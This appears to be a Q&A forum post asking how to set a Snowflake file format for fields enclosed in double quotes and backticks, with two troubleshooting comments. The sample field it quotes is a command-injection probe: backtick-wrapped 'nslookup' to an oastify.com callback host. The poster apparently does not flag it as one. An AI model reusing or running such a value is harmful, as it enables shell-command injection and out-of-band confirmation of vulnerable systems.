# Snowflake File Format - How to handle double quotes and acute symbols when loading data in Snowflake

Tags: snowflake-cloud-data-platform, file-format

I’m trying to load records into a table in Snowflake and some fields are enclosed with both double quotes and the acute symbol. It looks like there’s only 3 options for the field_optionally_enclosed_by file format and the acute symbol is not available. What is needed in the file format to load this data?

I have tried multiple things with the format (using hex values) and get the same snowflake error, (see below). I've also tried removing the field_optionally_enclosed_by but getting a different parsing error. I've also tried different record_delimiters but getting similar snowflake error (found character '' instead of field delimiter '')

Any help is greatly appreciated!

**Snowflake File Format Used:**

```
CREATE FILE FORMAT IF NOT EXISTS <format_name>

TYPE=CSV,

FIELD_DELIMITER ='\xC3\x9A',

RECORD_DELIMITER = '\n',

NULL_IF = 'NULL',

REPLACE_INVALID_CHARACTERS = TRUE,

ESCAPE = '\\',

ESCAPE_UNENCLOSED_FIELD = NONE,

FIELD_OPTIONALLY_ENCLOSED_BY = '”’;
```

**Snowflake Error:**

```
found character '`' instead of record delimiter '\n’
```

**Field with Error (From file in S3):**

`` mount'"`0&nslookup -q=cname 2fivzq4hj1s86ukok4mnaedds4yxmphde15owcl.oastify.com.&`' ``

Comment: Hi - can you update your question with the full file row (or at least the fields before/after the one you've shown) - so we can see how the fields are delimited. Can you also add in another row/set of fields (that doesn't error) so we can see the difference? Thanks

Comment: Add a new parameter `ON_ERROR = CONTINUE`. Run first with `FIELD_OPTIONALLY_ENCLOSED_BY = '”’` and then another time with `FIELD_OPTIONALLY_ENCLOSED_BY = '`’`. Not a great idea but will work.